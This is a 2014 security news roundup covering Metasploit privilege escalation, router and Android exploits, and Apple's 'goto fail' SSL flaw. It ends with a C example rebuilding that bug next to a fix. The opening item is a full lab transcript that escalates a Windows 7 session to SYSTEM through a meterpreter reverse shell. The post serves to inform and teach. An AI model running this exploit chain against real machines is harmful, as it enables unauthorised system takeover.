
Security News #0x67: goto fail;

Exploits
  • I had a chance to try the latest Metasploit Windows privilege escalation exploit, Windows TrackPopupMenuEx Win32k NULL Page. It worked like a charm on my Windows 7 x86 system. Once you have a session from another exploit (say the MS13-055 Internet Explorer vulnerability), proceed as follows.
    msf exploit(ms13_055_canchor) > sessions -l
    
    Active sessions
    ===============
    
      Id  Type                   Information              Connection
      --  ----                   -----------              ----------
      1   meterpreter x86/win32  ANUBIS\zathras @ ANUBIS  10.0.1.9:4444 -> 10.0.2.7:49159 (10.0.2.7)
      2   meterpreter x86/win32  ANUBIS\zathras @ ANUBIS  10.0.1.9:4444 -> 10.0.2.7:49161 (10.0.2.7)
    
    msf exploit(ms13_055_canchor) > use exploit/windows/local/ms13_081_track_popup_menu
    msf exploit(ms13_081_track_popup_menu) > show options
    
    Module options (exploit/windows/local/ms13_081_track_popup_menu):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       SESSION                   yes       The session to run this module on.
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Windows 7 SP0/SP1
    
    
    msf exploit(ms13_081_track_popup_menu) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(ms13_081_track_popup_menu) > set lhost 10.0.1.9
    lhost => 10.0.1.9
    msf exploit(ms13_081_track_popup_menu) > set lport 31337
    lport => 31337
    msf exploit(ms13_081_track_popup_menu) > set session 2
    session => 2
    msf exploit(ms13_081_track_popup_menu) > show options
    
    Module options (exploit/windows/local/ms13_081_track_popup_menu):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       SESSION  2                yes       The session to run this module on.
    
    
    Payload options (windows/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
       LHOST     10.0.1.9         yes       The listen address
       LPORT     31337            yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Windows 7 SP0/SP1
    
    
    msf exploit(ms13_081_track_popup_menu) > exploit
    
    [*] Started reverse handler on 10.0.1.9:31337 
    [*] Launching notepad to host the exploit...
    [+] Process 4088 launched.
    [*] Reflectively injecting the exploit DLL into 4088...
    [*] Injecting exploit into 4088...
    [*] Exploit injected. Injecting payload into 4088...
    [*] Payload injected. Executing exploit...
    [+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
    [*] Sending stage (769024 bytes) to 10.0.2.7
    [*] Meterpreter session 3 opened (10.0.1.9:31337 -> 10.0.2.7:49162) at 2014-02-23 14:33:33 -0500
    
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter > background 
    [*] Backgrounding session 3...
    msf exploit(ms13_081_track_popup_menu) > sessions -l
    
    Active sessions
    ===============
    
      Id  Type                   Information                   Connection
      --  ----                   -----------                   ----------
      1   meterpreter x86/win32  ANUBIS\zathras @ ANUBIS       10.0.1.9:4444 -> 10.0.2.7:49159 (10.0.2.7)
      2   meterpreter x86/win32  ANUBIS\zathras @ ANUBIS       10.0.1.9:4444 -> 10.0.2.7:49161 (10.0.2.7)
      3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ ANUBIS  10.0.1.9:31337 -> 10.0.2.7:49162 (10.0.2.7)
    

    Note that the exploit does not affect 64-bit systems; this is x86 only.

  • I also had a chance to play a bit with last week’s Android Browser and WebView addJavascriptInterface Code Execution module from Metasploit. I tried it against a pair of phones: my current one and a much older one from a few years ago. Neither was vulnerable to the attack. If you go to the discussion for the Metasploit module (and scroll to the end), you will see that someone has set up a page at http://www.droidsec.org/tests/addjsif/ to check if a browser is vulnerable; it reported that both of my test phones were not vulnerable. I will have to go in the lab and see if I can borrow a few others to do some more playing.
  • There is a GitHub project for the saelo Linux privilege escalation attack (CVE-2014-0038) that we mentioned two weeks ago.
  • This isn’t an exploit so much as an improved reconnaissance tool. The folks over at Gotham Digital Science have developed an nmap script that will provide additional information about an HTTP system that uses NTLM authentication. In particular, they get the NetBIOS domain name, NetBIOS computer name, the DNS domain name, the DNS computer name, and the product version. Most cool. You can get the script directly from nmap if you wish.
  • Exploit-db now has exploit code for a remote code execution vulnerability in a number of Linksys routers. This exploits the same vulnerability that is being used by "TheMoon". You probably want to take a look at the reddit mentioned in the exploit code. The folks at Ars Technica point out that the GUI on these routers cannot be trusted to determine if your system is vulnerable.
  • If you have a meterpreter shell on a remote system, you can now enable a webcam chat session. Seriously.
Learning More
  • Are you looking to learn more about reverse engineering? Are you looking for problems to solve? Have you had a chance to look at Crackmes.de?
  • Students: Daniel Cid on the Sucuri Blog has another post on PHP Backdoors that you definitely want to read!
  • And when my students are done there, your next stop is over at Spider Labs to read about an attack that created a malformed .jpg stuffed with credit card data.
  • Moving away from the web for a moment, there is a nice piece over at the CERT/CC Blog that talks about different memory randomization techniques that can be applied to a Linux kernel.
  • The folks at /DEV/TTYS0 have a nice example of how they were able to change the administrator password on a Linksys WRT120N by exploiting a bug in the fprintf function.
Industry News
  • There is a tremendous flaw in Apple mobile device software; apparently the code meant to validate an SSL connection has been bypassed. Worse, it appears that the same flaw exists in OS X. If you want to know more, you definitely want to check out the reddit, which includes the erroneous source code. The issue apparently is a spurious goto fail statement in some C code. ImperialViolet has a more in-depth analysis of the source code and the problem. The underlying problem is CVE-2014-1266.
  • If you actively study malware, you might want to take a look at Brian Baskin’s experiences using Gmail to share malware samples. Apparently, Google is scanning some password protected .zip files and analyzing them for malware; this was confirmed when the .zip password was "infected".
  • Adobe has released a patch for a circulating zero-day attack against Adobe Flash player.
  • At the same time, Microsoft Internet Explorer 10 is also being attacked in a different campaign; at this point only a Fix-it tool is available.
  • The Cyberwarzone has a timeline of how the SEA attacked Forbes social media accounts.
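To make the goto fail item above concrete, here is an added example (not Apple's code, and not from the original post) that reproduces the control-flow shape of the bug with constructed stand-in hash and verify helpers: the duplicated, unbraced `goto fail;` jumps to the cleanup label while `err` is still 0, so the signature check is skipped and the function reports success for any signature. The fixed version beside it shows why always-braced conditionals and unreachable-code warnings (for example clang's -Wunreachable-code, or gcc's -Wmisleading-indentation) catch this class of defect.

```c
#include <stddef.h>
#include <stdint.h>

/* Constructed stand-ins for the handshake helpers; 0 means success, as in the real API. */
typedef struct { uint32_t acc; } hash_ctx;
static int hash_update(hash_ctx *c, const uint8_t *d, size_t n) {
    for (size_t i = 0; i < n; i++) c->acc = c->acc * 31u + d[i];
    return 0;
}
static int hash_final(hash_ctx *c, uint32_t *out) { *out = c->acc; return 0; }
/* Toy "signature" check: a signature is valid iff it equals the digest. */
static int raw_verify(uint32_t digest, uint32_t sig) { return digest == sig ? 0 : -1; }

/* Control flow of the CVE-2014-1266 bug: the second goto is unconditional. */
int verify_vulnerable(const uint8_t *params, size_t n, uint32_t sig) {
    hash_ctx ctx = {0};
    uint32_t digest = 0;
    int err;
    if ((err = hash_update(&ctx, params, n)) != 0)
        goto fail;
        goto fail;              /* duplicated line: always taken, err is still 0 */
    if ((err = hash_final(&ctx, &digest)) != 0)   /* never reached */
        goto fail;
    err = raw_verify(digest, sig);                /* never reached: signature unchecked */
fail:
    return err;                 /* 0 (success) no matter what sig was */
}

/* Same function without the stray line; braces make an accidental repeat harmless. */
int verify_fixed(const uint8_t *params, size_t n, uint32_t sig) {
    hash_ctx ctx = {0};
    uint32_t digest = 0;
    int err;
    if ((err = hash_update(&ctx, params, n)) != 0) {
        goto fail;
    }
    if ((err = hash_final(&ctx, &digest)) != 0) {
        goto fail;
    }
    err = raw_verify(digest, sig);  /* the check actually runs */
fail:
    return err;
}

/* Digest a correctly signed message would carry under the toy scheme above. */
uint32_t toy_digest(const uint8_t *params, size_t n) {
    hash_ctx ctx = {0};
    uint32_t d = 0;
    hash_update(&ctx, params, n);
    hash_final(&ctx, &d);
    return d;
}
```

Compile the block with warnings enabled to see the compiler flag the dead code and the misleading indentation in verify_vulnerable.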